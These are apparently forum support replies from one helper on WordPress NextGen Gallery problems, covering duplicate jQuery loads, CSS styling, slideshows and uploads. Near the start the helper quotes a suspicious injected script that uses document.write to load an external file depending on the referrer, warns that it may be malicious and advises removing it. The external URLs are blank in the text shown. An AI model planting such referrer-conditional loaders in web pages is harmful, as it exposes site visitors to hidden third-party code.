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I am hazarding a guess, but jquery (if my numbers are right) is being loaded at least 3 times.
The bit of code below downloads from not There is a very good chance that it is doing something nasty. It may be adding links to your site, or worse.
I would remove it immediately. It may be associated with the ubermenu plugin, if you happen to use it.Further research reveals there to actually be nothing there at this time, but I would get rid of it in case that changes.
This is no good:
<script type="text/javascript">if(!document.referrer || document.referrer == '') { document.write('<scr'+'ipt type="text/javascript" src=""></scr'+'ipt>'); } else { document.write('<scr'+'ipt type="text/javascript" src=""></scr'+'ipt>'); } </script>
Here are your two versions
Including two, which may be different versions, can cause problems. This is usually the result of a plugin or theme.There is the standard from wordpress:
<script type='text/javascript' src=''></script>
One from esaudioplayer:
<script type="text/javascript" src=""></script>
I would try to pair that down to one and see if that doesn’t help out.
Best bet is to comment all out but one
put <!-- before it and --> after
To see if you get one to work.Let me know if you need any help and if that works (and nothing else breaks).
Just a (hopefully helpful) note:
Cufon isn’t necessary anymore with things like
- Google Web Fonts – Completely Free
- Typekit – Free depending on usage
This should speed up the site and remove some unnecessary code.
This could be tricky.
Have you tried enabling and disabling?
Uninstall and reinstall?
Did the plugin ever work on your site?
If it did work at one time, what has changed since? (Plugin/Theme update/install)
Lastly, what theme are you using?
Since we have two instances of the issue, we might be able to cross-reference and track down the bug.
First try this:
Go to plugin page.
At the top, click inactive.
Do you see it now?
If that doesn’t work, try:
See if you can get FTP access to your account. You would need to talk to your host about that. A great free program for FTP access is FileZilla.
** This can be tricky if you’ve never done it before. When you contact the host, ask them for help if you want. If their nice, they just might lend you a hand **
Navigate to this folder:
Do you see a nextgen-gallery folder? Is it empty?
If its empty, delete it. Then try re-installing.
If it’s not empty, something might be up. Let me know what you find.
I am going to hazard a guess that it is because you have to reload to access another page.
There is a setting I imagine you’ve selected in NextGen Options on the gallery tab “Add hidden images”
Perhaps, when it adds the images, it doesn’t load all of their info.
There is a small possibility it will work if you use the following option “Enable AJAX pagination” but that doesn’t work with thickbox.
The easy solution is to just disable “Add hidden images”. It will speed up your page, and you won’t have the situation of an image without a caption.
The plugin author also commented on the original article.
The problem is apparently fixed.
Is that what you were referring to?
Yeah, sorry if I sound patronizing. I never know how savvy the person I’m replying to is, so I usually resort to the simplest explanation possible.
Unfortunately it results in some completely useless answers…
So, when you click “Use as featured image” it changes to “Saving…” and just freezes? No errors, nothing?
In NextGen’s code, right after it does that, it uses the jquery post function to do the magic that actually sets the featured image.
Is there a possibility you have multiple versions of jquery?
Between plugins and themes, a jquery version or two can get included causing problems.
It would be hard for me to debug why it’s not working for you without actually getting a look at your setup.
Other random advice: Any other updates since it worked? Try disabling plugins etc. What changed two days ago ^_^?!?
If you want to get down and dirty with the code, I would be willing to point you towards the relevant NextGen files and code that should be setting the featured post.
Since you get the “saving…” that part works, but either the doesn’t work (because of multiple version of jquery) or the post never completes.
There is plenty of error handling code in there, the link should say “error” if something goes wrong, or it should exit out in some other way.
I actually just tested it (edited code to make it fail) and the error did show up in the box where the image should have been.
The post seems to be the issue, at least according to the info I have.
I don’t know what kind of styling you are doing exactly.
Which slideshow are you using? If you are referring to the “[Show as slideshow]” link you can do this…
Add css styles to the slideshow element via Galleries->Style with this selector:
.ngg-slideshow { /* some rules will already be here */ /* just add your own below */ } For the images directly, add this: .ngg-slideshow img { /* Add your styles */ }
CSS can do some pretty fancy things these days. If you get something like Firebug for Firefox you can edit the CSS and see what it does instantly. Then, just copy what you’ve made into the file in the above portion of the CSS file.
Just to clarify, do you want to style just the slideshow, or both?
You can use
<?php echo nggShow_JS_Slideshow($galleryID, $width, $height) ?>
to insert a slideshow in a template somewhere (a template for your theme perhaps). That only allows you to edit width and height of course.Your back to CSS unless you want to edit the relevant sections of nggfunctions.php (where the code that actually generates the HTML for the slideshow appears to live).
I would love to help, but I am a bit confused about what exactly you’re asking.
I looked around, but couldn’t find a reference to a single-post gallery.
If you can be more specific I will do ma’ best.
Two quick questions:
Did it ever work on the front page? If yes, what else changed? Any other plugin/theme updates?
If no, continue to the question below.
On your theme, how do you set your home page?
Did you create a page, and then go into WordPress Settings->Reading and set up your front page to use a static page?
Check that setting and see what it is set to.
There is a possibility that your theme decided to do its own thing for your home page. This might mean Settings->Reading is set to “Latest Blog Posts” even though you have a static front page.
Let me know if that’s the case.
I don’t think your going to find a way for NextGen to grab images off of an external site.
Do you own the site? Grab the pictures from there to make it easy for yourself. If you don’t, it isn’t really very nice to “leech” images from another site. It can even be illegal.
Why do you want to add the grab the pictures from another site?
There is a caption template, which can be used like so (replace * with the gallery id you want to display):
[nggallery id=* template=caption]
The caption will be taken from description portion of the image data. You can actually stuff html and just about anything you want in there too.
It would appear that NextGen gallery uses JW Image Rotator, which is available here.
If you go to NextGen Gallery’s options, there is a slideshow tab. It also includes a link to the above site, along with many options to configure the image rotator.
I’ve had this issue.
It seems that it should be centered by default, but for some reason it’s broken before.
You need to go into nggallery.css and find this
.ngg-gallery-thumbnail { //Some rules //Make sure that this next line appears text-align: center; }
If the text-align bit is there and your still not centered, then something else is likely wrong.
You can import images from your computer directly, in a zip, or from a folder on your server.
It doesn’t look like you can get them directly from Google Drive.
Get them to one of those places and you should be good.
Google drive seems to allow you to select multiple images, which you can then download as a zip. That would be perfect to upload into NextGen.
You will have to watch out for file sizes. Depending on PHP settings, there is a cap on a single files upload size.
A plugin plugin is what you need!
NextGen Gallery Social Plugins
There are other ways, but this is the easiest.
Whoops. Forgot email:
steven (at) simplicity (dot) is
replace with proper symbols and remove spaces of course.
Then, I can email you when I’ve got a proper site set up if your interested.